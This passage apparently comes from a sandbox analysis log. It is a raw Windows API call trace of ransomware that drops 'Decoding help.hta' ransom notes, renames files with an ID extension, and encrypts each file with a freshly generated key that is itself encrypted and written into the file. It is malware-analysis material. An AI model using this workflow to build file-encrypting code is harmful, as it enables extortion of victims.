pbData=0x8650000, pdwDataLen=0xb54fce4*=0x39780, dwBufLen=0x39780 | out: pbData=0x8650000*, pdwDataLen=0xb54fce4*=0x39780) returned 1 [0049.520] UnmapViewOfFile (lpBaseAddress=0x8650000) returned 1 [0049.602] CloseHandle (hObject=0x638) returned 1 [0049.602] CryptDestroyKey (hKey=0x6711b0) returned 1 [0049.602] CryptReleaseContext (hProv=0x3448720, dwFlags=0x0) returned 1 [0049.602] SetFilePointerEx (in: hFile=0x634, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0049.602] WriteFile (in: hFile=0x634, lpBuffer=0xb54fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xb54fcf8, lpOverlapped=0x0 | out: lpBuffer=0xb54fbe4*, lpNumberOfBytesWritten=0xb54fcf8*=0x100, lpOverlapped=0x0) returned 1 [0051.178] WriteFile (in: hFile=0x634, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xb54fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xb54fcf8*=0x500, lpOverlapped=0x0) returned 1 [0051.178] CloseHandle (hObject=0x634) returned 1 [0051.679] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaureg.exe.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0055.302] FindNextFileW (in: hFindFile=0x670ff0, lpFindFileData=0xb54fd30 | out: lpFindFileData=0xb54fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dd4800, ftCreationTime.dwHighDateTime=0x1ce76b1, ftLastAccessTime.dwLowDateTime=0x80220580, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x5dd4800, ftLastWriteTime.dwHighDateTime=0x1ce76b1, nFileSizeHigh=0x0, nFileSizeLow=0x7bd80, dwReserved0=0x0, dwReserved1=0x0, cFileName="jucheck.exe", cAlternateFileName="")) returned 1 [0055.302] lstrcpyW (in: lpString1=0x10fcf5c8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*" [0055.302] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*") returned 60 [0055.302] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\Decoding help.hta" [0055.302] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\decoding help.hta")) returned 0x1 [0055.302] lstrcmpiW (lpString1="Decoding help.hta", lpString2="jucheck.exe") returned -1 [0055.302] lstrlenW (lpString="jucheck.exe") returned 11 [0055.302] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*" [0055.302] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*") returned 60 [0055.302] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\", lpString2="jucheck.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jucheck.exe") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jucheck.exe" [0055.302] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jucheck.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jucheck.exe") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jucheck.exe" [0055.302] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jucheck.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jucheck.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jucheck.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0055.303] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jucheck.exe" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jucheck.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jucheck.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jucheck.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0056.105] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jucheck.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jucheck.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x738 [0056.105] CreateFileMappingA (hFile=0x738, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0056.105] CryptAcquireContextA (in: phProv=0xb54fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xb54fcec*=0x3449f08) returned 1 [0059.814] CryptGenKey (in: hProv=0x3449f08, Algid=0x6610, dwFlags=0x1, phKey=0xb54fce8 | out: phKey=0xb54fce8*=0x671430) returned 1 [0059.814] CryptExportKey (in: hKey=0x671430, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xb54fbe4, pdwDataLen=0xb54fce4 | out: pbData=0xb54fbe4*, pdwDataLen=0xb54fce4*=0x2c) returned 1 [0059.814] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7bd80) returned 0x5810000 [0059.847] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xb54fbe4*, pdwDataLen=0xb54fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xb54fbe4*, pdwDataLen=0xb54fcf8*=0x100) returned 1 [0059.847] CryptEncrypt (in: hKey=0x671430, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5810000, pdwDataLen=0xb54fce4*=0x7bd80, dwBufLen=0x7bd80 | out: pbData=0x5810000*, pdwDataLen=0xb54fce4*=0x7bd80) returned 1 [0060.003] UnmapViewOfFile (lpBaseAddress=0x5810000) returned 1 [0060.017] CloseHandle (hObject=0x660) returned 1 [0060.018] CryptDestroyKey (hKey=0x671430) returned 1 [0060.018] CryptReleaseContext (hProv=0x3449f08, dwFlags=0x0) returned 1 [0060.018] SetFilePointerEx (in: hFile=0x738, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.018] WriteFile (in: hFile=0x738, lpBuffer=0xb54fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xb54fcf8, lpOverlapped=0x0 | out: lpBuffer=0xb54fbe4*, lpNumberOfBytesWritten=0xb54fcf8*=0x100, lpOverlapped=0x0) returned 1 [0061.426] WriteFile (in: hFile=0x738, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xb54fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xb54fcf8*=0x500, lpOverlapped=0x0) returned 1 [0061.426] CloseHandle (hObject=0x738) returned 1 [0061.426] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jucheck.exe.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0061.426] FindNextFileW (in: hFindFile=0x670ff0, lpFindFileData=0xb54fd30 | out: lpFindFileData=0xb54fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x249c100, ftCreationTime.dwHighDateTime=0x1ce76b1, ftLastAccessTime.dwLowDateTime=0x80220580, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x249c100, ftLastWriteTime.dwHighDateTime=0x1ce76b1, nFileSizeHigh=0x0, nFileSizeLow=0x3e180, dwReserved0=0x0, dwReserved1=0x0, cFileName="jusched.exe", cAlternateFileName="")) returned 1 [0061.426] lstrcpyW (in: lpString1=0x10960808, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*" [0061.426] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*") returned 60 [0061.426] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\Decoding help.hta" [0061.426] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\decoding help.hta")) returned 0x1 [0061.426] lstrcmpiW (lpString1="Decoding help.hta", lpString2="jusched.exe") returned -1 [0061.426] lstrlenW (lpString="jusched.exe") returned 11 [0061.426] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*" [0061.427] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*") returned 60 [0061.427] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\", lpString2="jusched.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jusched.exe") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jusched.exe" [0061.427] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jusched.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jusched.exe") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jusched.exe" [0061.427] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jusched.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jusched.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jusched.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0061.427] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jusched.exe" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jusched.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jusched.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jusched.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.428] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jusched.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jusched.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x738 [0061.428] CreateFileMappingA (hFile=0x738, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6b0 [0061.428] CryptAcquireContextA (phProv=0xb54fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 299 os_tid = 0x40c [0042.431] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\*.*", lpFindFileData=0xb90fd30 | out: lpFindFileData=0xb90fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd8d1336, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd8d1336, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671130 [0042.432] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.432] FindNextFileW (in: hFindFile=0x671130, lpFindFileData=0xb90fd30 | out: lpFindFileData=0xb90fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd8d1336, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd8d1336, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.432] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.432] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.432] FindNextFileW (in: hFindFile=0x671130, lpFindFileData=0xb90fd30 | out: lpFindFileData=0xb90fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b309dbc, ftCreationTime.dwHighDateTime=0x1c9ea10, ftLastAccessTime.dwLowDateTime=0x5b309dbc, ftLastAccessTime.dwHighDateTime=0x1c9ea10, ftLastWriteTime.dwLowDateTime=0x872c4350, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x95000, dwReserved0=0x0, dwReserved1=0x0, cFileName="dao360.dll", cAlternateFileName="")) returned 1 [0042.432] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\*.*" [0042.432] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\*.*") returned 64 [0042.432] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\Decoding help.hta" [0042.432] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\dao\\decoding help.hta")) returned 0xffffffff [0042.432] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\dao\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x648 [0042.457] WriteFile (in: hFile=0x648, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xb90fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xb90fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.457] CloseHandle (hObject=0x648) returned 1 [0042.458] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.458] lstrcmpiW (lpString1="Decoding help.hta", lpString2="dao360.dll") returned 1 [0042.458] lstrlenW (lpString="dao360.dll") returned 10 [0042.458] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\*.*" [0042.458] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\*.*") returned 64 [0042.458] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\", lpString2="dao360.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\dao360.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\dao360.dll" [0042.458] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\dao360.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\dao360.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\dao360.dll" [0042.458] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\dao360.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\dao360.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\dao360.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0042.458] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\dao360.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\dao\\dao360.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\DAO\\dao360.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\dao\\dao360.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.460] FindNextFileW (in: hFindFile=0x671130, lpFindFileData=0xb90fd30 | out: lpFindFileData=0xb90fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b309dbc, ftCreationTime.dwHighDateTime=0x1c9ea10, ftLastAccessTime.dwLowDateTime=0x5b309dbc, ftLastAccessTime.dwHighDateTime=0x1c9ea10, ftLastWriteTime.dwLowDateTime=0x872c4350, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x95000, dwReserved0=0x0, dwReserved1=0x0, cFileName="dao360.dll", cAlternateFileName="")) returned 0 [0042.460] FindClose (in: hFindFile=0x671130 | out: hFindFile=0x671130) returned 1 Thread: id = 300 os_tid = 0x2b4 [0042.448] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*", lpFindFileData=0x14d1fd30 | out: lpFindFileData=0x14d1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed5e6b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x60d54030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60d54030, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2fb0 [0045.460] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.460] FindNextFileW (in: hFindFile=0x5e2fb0, lpFindFileData=0x14d1fd30 | out: lpFindFileData=0x14d1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed5e6b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x60d54030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60d54030, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.617] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.617] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.617] FindNextFileW (in: hFindFile=0x5e2fb0, lpFindFileData=0x14d1fd30 | out: lpFindFileData=0x14d1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed5e6b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed5e6b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1028", cAlternateFileName="")) returned 1 [0048.617] lstrcmpW (lpString1=".", lpString2="1028") returned -1 [0048.617] lstrcmpW (lpString1="..", lpString2="1028") returned -1 [0048.617] lstrcmpiW (lpString1="windows", lpString2="1028") returned 1 [0048.619] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*" [0048.619] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*") returned 65 [0048.619] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\", lpString2="1028" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028" [0048.619] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1028\\*.*" [0048.619] GlobalMemoryStatus (in: lpBuffer=0x14d1fd10 | out: lpBuffer=0x14d1fd10) [0048.619] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x246bd470, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x308 [0048.630] CloseHandle (hObject=0x308) returned 1 [0048.630] FindNextFileW (in: hFindFile=0x5e2fb0, lpFindFileData=0x14d1fd30 | out: lpFindFileData=0x14d1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed5e6b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed5e6b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1031", cAlternateFileName="")) returned 1 [0048.630] lstrcmpW (lpString1=".", lpString2="1031") returned -1 [0048.630] lstrcmpW (lpString1="..", lpString2="1031") returned -1 [0048.630] lstrcmpiW (lpString1="windows", lpString2="1031") returned 1 [0048.633] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*" [0048.633] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*") returned 65 [0048.633] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\", lpString2="1031" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031" [0048.633] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1031\\*.*" [0048.633] GlobalMemoryStatus (in: lpBuffer=0x14d1fd10 | out: lpBuffer=0x14d1fd10) [0048.633] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2470d540, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x308 [0048.643] CloseHandle (hObject=0x308) returned 1 [0048.643] FindNextFileW (in: hFindFile=0x5e2fb0, lpFindFileData=0x14d1fd30 | out: lpFindFileData=0x14d1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed84810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed84810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0048.643] lstrcmpW (lpString1=".", lpString2="1033") returned -1 [0048.643] lstrcmpW (lpString1="..", lpString2="1033") returned -1 [0048.643] lstrcmpiW (lpString1="windows", lpString2="1033") returned 1 [0048.646] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*" [0048.646] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*.*") returned 65 [0048.646] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\", lpString2="1033" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033" [0048.646] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\*.*" [0048.646] GlobalMemoryStatus (in: lpBuffer=0x14d1fd10 | out: lpBuffer=0x14d1fd10) [0048.646] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24755678, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x308 [0048.659] CloseHandle (hObject=0x308) returned 1 [0048.659] FindNextFileW (in: hFindFile=0x5e2fb0, lpFindFileData=0x14d1fd30 | out: lpFindFileData=0x14d1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed84810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed84810, ftLastWriteTime.dwHighDateTime=0x1d301be, 